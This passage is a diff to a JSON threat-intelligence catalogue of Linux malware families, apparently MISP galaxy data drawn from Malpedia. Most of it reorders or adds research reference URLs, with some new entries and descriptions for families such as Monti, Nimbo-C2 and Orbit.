"https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/", + "https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/", + "https://analyst1.com/ransomware-diaries-volume-1/", + "https://lifars.com/wp-content/uploads/2022/02/LockBitRansomware_Whitepaper.pdf", + "https://www.ic3.gov/Media/News/2022/220204.pdf", + "https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html", + "https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/", + "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", + "https://www.crowdstrike.com/blog/better-together-global-attitude-survey-takeaways-2021/", + "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-variants", + "https://github.com/prodaft/malware-ioc/tree/master/PTI-257", + "https://www.bleepingcomputer.com/news/security/lockbit-victim-estimates-cost-of-ransomware-attack-to-be-42-million/", "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-variants" + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", + "https://securelist.com/crimeware-report-lockbit-switchsymb/110068/", + "https://security.packt.com/understanding-lockbit/", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html" ], "synonyms": [], "type": [] @@ -5354,9 +5563,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.loerbas", + "https://atdotde.blogspot.com/2020/05/high-performance-hackers.html", "https://www.cadosecurity.com/2020/05/16/1318/", - "https://twitter.com/nunohaien/status/1261281419483140096", - "https://atdotde.blogspot.com/2020/05/high-performance-hackers.html" + "https://twitter.com/nunohaien/status/1261281419483140096" ], "synonyms": [], "type": [] @@ -5423,9 +5632,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.masuta", + "https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7", "https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/", - "https://www.virusbulletin.com/virusbulletin/2018/12/vb2018-paper-tracking-mirai-variants/#h2-appendix-sample-sha256-hashes", - "https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7" + "https://www.virusbulletin.com/virusbulletin/2018/12/vb2018-paper-tracking-mirai-variants/#h2-appendix-sample-sha256-hashes" ], "synonyms": [ "PureMasuta" @@ -5453,10 +5662,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.melofee", - "https://blog.exatrack.com/melofee/" + "https://blog.exatrack.com/melofee/", + "https://asec.ahnlab.com/en/55785/", + "https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/" ], "synonyms": [ - "Mélofée" + "M\u00e9lof\u00e9e" ], "type": [] }, @@ -5469,12 +5680,12 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.messagetap", "https://attack.mitre.org/groups/G0096", + "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html", + "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", - "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", - "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/" + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought" ], "synonyms": [], "type": [] @@ -5487,8 +5698,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.midrashim", - "https://github.com/guitmz/midrashim", - "https://www.guitmz.com/linux-midrashim-elf-virus/" + "https://www.guitmz.com/linux-midrashim-elf-virus/", + "https://github.com/guitmz/midrashim" ], "synonyms": [], "type": [] @@ -5501,8 +5712,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mikey", - "https://securitykitten.github.io/2016/12/14/mikey.html", - "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2016-12-14-mikey.md" + "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2016-12-14-mikey.md", + "https://securitykitten.github.io/2016/12/14/mikey.html" ], "synonyms": [], "type": [] @@ -5515,66 +5726,73 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai", - "https://www.cadosecurity.com/technical-analysis-of-the-ddos-attacks-against-ukrainian-websites/", - "https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/", - "https://blog.reversinglabs.com/blog/mirai-botnet-continues-to-plague-iot-space", - "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/", - "https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html", - "https://isc.sans.edu/diary/22786", - "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022", - "http://osint.bambenekconsulting.com/feeds/", - "https://unit42.paloaltonetworks.com/cve-2021-32305-websvn/", - "https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/", - "https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - "https://www.crowdstrike.com/blog/linux-mirai-malware-double-on-stronger-chips/", - "https://community.riskiq.com/article/d8a78daf", - "https://www.politie.nl/nieuws/2019/oktober/2/11-servers-botnet-offline.html", - "https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/", - "https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039", - "https://blog.trendmicro.com/trendlabs-security-intelligence/mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902/", - "https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts", - "https://exchange.xforce.ibmcloud.com/collection/InfectedNight-Mirai-Variant-With-Massive-Attacks-On-Our-Honeypots-dbea3e9e39b8265e729545fa798e4d18", - "https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/", - "https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/", - "https://cert.gov.ua/article/37139", - "https://synthesis.to/2021/06/30/automating_string_decryption.html", - "https://www.youtube.com/watch?v=KVJyYTie-Dc", - "https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx", "https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/", - "https://www.lacework.com/blog/malware-targeting-latest-f5-vulnerability/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tough-times-for-ukrainian-honeypot", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-variant-expands-arsenal-exploits-cve-2020-10173/", - "https://www.fortinet.com/blog/threat-research/multiple-malware-campaigns-target-vmware-vulnerability", - "https://cybersecurity.att.com/blogs/labs-research/malware-hosting-domain-cyberium-fanning-out-mirai-variants", - "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/", - "https://socradar.io/what-you-need-to-know-about-russian-cyber-escalation-in-ukraine/", - "https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html", - "https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group", - "https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/", - "https://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/", - "https://prod-blog.avira.com/katana-a-new-variant-of-the-mirai-botnet", - "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/", - "https://www.netscout.com/blog/asert/ddos-attack-campaign-targeting-multiple-organizations-ukraine", - "https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093", - "https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/", - "https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt", - "https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/", "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/", - "https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai", - "https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet", - "https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/", - "https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/with-mirai-comes-miori-iot-botnet-delivered-via-thinkphp-remote-code-execution-exploit/", + "https://cybersecurity.att.com/blogs/labs-research/malware-hosting-domain-cyberium-fanning-out-mirai-variants", + "https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/", + "https://www.cadosecurity.com/technical-analysis-of-the-ddos-attacks-against-ukrainian-websites/", "https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html", - "https://blogs.jpcert.or.jp/en/2022/03/anti_upx_unpack.html", - "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf", - "https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign", - "https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/", - "https://github.com/jgamblin/Mirai-Source-Code", - "https://forensicitguy.github.io/extracting-indicators-from-packed-mirai/", + "http://osint.bambenekconsulting.com/feeds/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-variant-expands-arsenal-exploits-cve-2020-10173/", + "https://www.youtube.com/watch?v=KVJyYTie-Dc", + "https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/", + "https://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/", + "https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/", + "https://www.lacework.com/blog/malware-targeting-latest-f5-vulnerability/", + "https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/", "https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/", - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/" + "https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html", + "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902/", + "https://www.fortinet.com/blog/threat-research/multiple-malware-campaigns-target-vmware-vulnerability", + "https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/", + "https://socradar.io/what-you-need-to-know-about-russian-cyber-escalation-in-ukraine/", + "https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt", + "https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093", + "https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/", + "https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/", + "https://unit42.paloaltonetworks.com/new-mirai-variant-mukashi/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/", + "https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/", + "https://exchange.xforce.ibmcloud.com/collection/InfectedNight-Mirai-Variant-With-Massive-Attacks-On-Our-Honeypots-dbea3e9e39b8265e729545fa798e4d18", + "https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039", + "https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign", + "https://community.riskiq.com/article/d8a78daf", + "https://unit42.paloaltonetworks.com/cve-2020-17496/", + "https://www.crowdstrike.com/blog/linux-mirai-malware-double-on-stronger-chips/", + "https://github.com/jgamblin/Mirai-Source-Code", + "https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group", + "https://isc.sans.edu/diary/22786", + "https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/", + "https://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/", + "https://unit42.paloaltonetworks.com/mirai-variant-echobot-resurfaces-with-13-previously-unexploited-vulnerabilities/", + "https://deform.co/the-infamous-mirai-trojan-evolves-new-pandora-variant-targets-android-tvs/", + "https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet", + "https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx", + "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/", + "https://blog.reversinglabs.com/blog/mirai-botnet-continues-to-plague-iot-space", + "https://www.netscout.com/blog/asert/ddos-attack-campaign-targeting-multiple-organizations-ukraine", + "https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/", + "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/", + "https://unit42.paloaltonetworks.com/cve-2021-32305-websvn/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/with-mirai-comes-miori-iot-botnet-delivered-via-thinkphp-remote-code-execution-exploit/", + "https://www.politie.nl/nieuws/2019/oktober/2/11-servers-botnet-offline.html", + "https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tough-times-for-ukrainian-honeypot", + "https://forensicitguy.github.io/extracting-indicators-from-packed-mirai/", + "https://cert.gov.ua/article/37139", + "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022", + "https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/", + "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf", + "https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/", + "https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts", + "https://prod-blog.avira.com/katana-a-new-variant-of-the-mirai-botnet", + "https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html", + "https://synthesis.to/2021/06/30/automating_string_decryption.html", + "https://blogs.jpcert.or.jp/en/2022/03/anti_upx_unpack.html", + "https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/" ], "synonyms": [ "Katana" @@ -5610,15 +5828,28 @@ "uuid": "aaf8ce1b-3117-47c6-b756-809538ac8ff2", "value": "Momentum" }, + { + "description": "A ransomware, derived from the leaked Conti source code.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.monti", + "https://www.trendmicro.com/en_us/research/23/h/monti-ransomware-unleashes-a-new-encryptor-for-linux.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7df77b77-00dd-4eba-a697-b9a7be262acc", + "value": "Monti" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot", "https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/", - "https://unit42.paloaltonetworks.com/moobot-d-link-devices/", - "https://otx.alienvault.com/pulse/6075b645942d5adf9bb8949b", "https://blog.netlab.360.com/ddos-botnet-moobot-en/", + "https://otx.alienvault.com/pulse/6075b645942d5adf9bb8949b", + "https://unit42.paloaltonetworks.com/moobot-d-link-devices/", "https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/", "https://www.fortinet.com/blog/threat-research/mirai-based-botnet-moobot-targets-hikvision-vulnerability" ], @@ -5635,8 +5866,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.moose", "http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/", "http://www.welivesecurity.com/2015/05/26/moose-router-worm/", - "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Paquet-Clouston.pdf", - "http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/" + "http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/", + "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Paquet-Clouston.pdf" ], "synonyms": [], "type": [] @@ -5649,17 +5880,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mozi", - "https://www.microsoft.com/security/blog/2021/08/19/how-to-proactively-defend-against-mozi-iot-botnet/", - "https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/", - "https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/", + "https://www.nozominetworks.com/blog/how-iot-botnets-evade-detection-and-analysis/", "https://www.nozominetworks.com/blog/overcoming-the-challenges-of-detecting-p2p-botnets-on-your-network/", - "https://blog.netlab.360.com/mozi-another-botnet-using-dht/", + "https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/", + "https://www.elastic.co/blog/collecting-and-operationalizing-threat-data-from-the-mozi-botnet", "https://www.youtube.com/watch?v=cDFO_MRlg3M", - "https://blog.centurylink.com/new-mozi-malware-family-quietly-amasses-iot-bots/", + "https://blog.netlab.360.com/p2p-botnets-review-status-continuous-monitoring/", "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf", "https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/", - "https://www.nozominetworks.com/blog/how-iot-botnets-evade-detection-and-analysis/", - "https://www.elastic.co/blog/collecting-and-operationalizing-threat-data-from-the-mozi-botnet" + "https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/", + "https://blog.netlab.360.com/mozi-another-botnet-using-dht/", + "https://blog.centurylink.com/new-mozi-malware-family-quietly-amasses-iot-bots/", + "https://www.microsoft.com/security/blog/2021/08/19/how-to-proactively-defend-against-mozi-iot-botnet/" ], "synonyms": [], "type": [] @@ -5672,10 +5904,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mrblack", + "https://www.bleepingcomputer.com/news/security/exposed-docker-apis-abused-by-ddos-cryptojacking-botnet-malware/", + "https://news.drweb.com/?i=5760&c=23&lng=en", "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf", - "https://news.drweb.com/?i=5760&c=23&lng=en" + "https://blog.syscall.party/post/aes-ddos-analysis-part-1/", + "https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf" + ], + "synonyms": [ + "AESDDoS", + "Dofloo" ], - "synonyms": [], "type": [] }, "uuid": "fc047e32-9cf2-4a92-861a-be882efd8a50", @@ -5712,8 +5950,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ngioweb", - "https://blog.netlab.360.com/an-analysis-of-linux-ngioweb-botnet-en/", "https://twitter.com/IntezerLabs/status/1324346324683206657", + "https://blog.netlab.360.com/an-analysis-of-linux-ngioweb-botnet-en/", "https://blog.netlab.360.com/linux-ngioweb-v2-going-after-iot-devices-en/" ], "synonyms": [], @@ -5722,6 +5960,19 @@ "uuid": "a4ad242c-6fd0-4b1d-8d97-8f48150bf242", "value": "Ngioweb (ELF)" }, + { + "description": "According to the author, Nimbo-C2 is yet another (simple and lightweight) C2 framework. The agent currently supports Windows x64 and Linux. It's written in Nim, with some usage of .NET (by dynamically loading the CLR to the process).", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.nimbo_c2", + "https://github.com/itaymigdal/Nimbo-C2" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5dbdf2ea-a15b-4ad6-bf7a-a030998c66b4", + "value": "Nimbo-C2 (ELF)" + }, { "description": "Golang-based RAT that offers execution of shell commands and download+run capability. ", "meta": { @@ -5741,14 +5992,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.notrobin", - "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", - "https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html", - "https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html", - "https://dcso.de/2020/01/16/a-curious-case-of-cve-2019-19781-palware-remove_bds/", + "https://news.sophos.com/en-us/2020/05/21/asnarok2/", "https://blog.dcso.de/a-curious-case-of-cve-2019-19781-palware-remove_bds/", - "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", "https://www.theregister.co.uk/2020/01/17/hackers_patch_citrix_vulnerability/", - "https://news.sophos.com/en-us/2020/05/21/asnarok2/" + "https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://dcso.de/2020/01/16/a-curious-case-of-cve-2019-19781-palware-remove_bds/", + "https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html", + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought" ], "synonyms": [ "remove_bds" @@ -5759,7 +6010,7 @@ "value": "NOTROBIN" }, { - "description": "", + "description": "According to stormshield, Orbit is a two-stage malware that appeared in July 2022, discovered by Intezer lab. Acting as a stealer and backdoor on 64-bit Linux systems, it consists of an executable acting as a dropper and a dynamic library.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.orbit", @@ -5776,13 +6027,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.owari", - "https://twitter.com/ankit_anubhav/status/1019647993547550720", - "https://twitter.com/hrbrmstr/status/1019922651203227653", - "https://blog.newskysecurity.com/understanding-the-iot-hacker-a-conversation-with-owari-sora-iot-botnet-author-117feff56863", - "https://twitter.com/360Netlab/status/1019759516789821441", + "https://www.bleepingcomputer.com/news/security/router-crapfest-malware-author-builds-18-000-strong-botnet-in-a-day/", "https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html", - "https://www.scmagazine.com/malware-author-anarchy-builds-18000-strong-huawei-router-botnet/article/782395/", - "https://www.bleepingcomputer.com/news/security/router-crapfest-malware-author-builds-18-000-strong-botnet-in-a-day/" + "https://twitter.com/ankit_anubhav/status/1019647993547550720", + "https://blog.newskysecurity.com/understanding-the-iot-hacker-a-conversation-with-owari-sora-iot-botnet-author-117feff56863", + "https://twitter.com/hrbrmstr/status/1019922651203227653", + "https://twitter.com/360Netlab/status/1019759516789821441", + "https://www.scmagazine.com/malware-author-anarchy-builds-18000-strong-huawei-router-botnet/article/782395/" ], "synonyms": [], "type": [] @@ -5821,18 +6072,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.penquin_turla", - "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf", "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://twitter.com/juanandres_gs/status/944741575837528064", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180251/Penquins_Moonlit_Maze_PDF_eng.pdf", "https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf", - "https://lab52.io/blog/looking-for-penquins-in-the-wild/", - "https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf", "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf", - "https://www.youtube.com/watch?v=JXsjRUxx47E", - "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", + "https://twitter.com/juanandres_gs/status/944741575837528064", + "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", - "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf" + "https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf", + "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", + "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://lab52.io/blog/looking-for-penquins-in-the-wild/", + "https://www.youtube.com/watch?v=JXsjRUxx47E" ], "synonyms": [], "type": [] @@ -5847,16 +6099,19 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.perlbot", "https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/", "https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf", + "https://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/", "https://twitter.com/Nocturnus/status/1308430959512092673", - "https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html", - "https://therecord.media/agents-raid-home-of-kansas-man-seeking-info-on-botnet-that-infected-dod-network/", - "https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/", "https://brianstadnicki.github.io/posts/malware-gitlab-perlbot/", + "https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/", "https://unit42.paloaltonetworks.com/los-zetas-from-eleethub-botnet/", - "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", - "https://sysdig.com/blog/malware-analysis-shellbot-sysdig/", + "https://asec.ahnlab.com/en/54647/", "https://jask.com/wp-content/uploads/2019/02/Shellbot-Campaign_v2.pdf", - "https://asec.ahnlab.com/en/49769/" + "https://therecord.media/agents-raid-home-of-kansas-man-seeking-info-on-botnet-that-infected-dod-network/", + "https://sysdig.com/blog/malware-analysis-shellbot-sysdig/", + "https://unit42.paloaltonetworks.com/cve-2020-17496/", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://asec.ahnlab.com/en/49769/", + "https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html" ], "synonyms": [ "DDoS Perl IrcBot", @@ -5885,7 +6140,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.pingpull", - "https://unit42.paloaltonetworks.com/alloy-taurus/" + "https://unit42.paloaltonetworks.com/alloy-taurus/", + "https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/" ], "synonyms": [], "type": [] @@ -5898,7 +6154,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.pink", - "https://blog.netlab.360.com/pink-en/" + "https://blog.netlab.360.com/pink-en/", + "https://blog.netlab.360.com/p2p-botnets-review-status-continuous-monitoring/" ], "synonyms": [], "type": [] @@ -5911,14 +6168,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.plead", - "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf", - "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", "https://cyberandramen.net/2021/02/11/blacktech-updates-elf-plead-backdoor/", + "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf", + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", "https://blogs.jpcert.or.jp/en/2020/11/elf-plead.html", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020", - 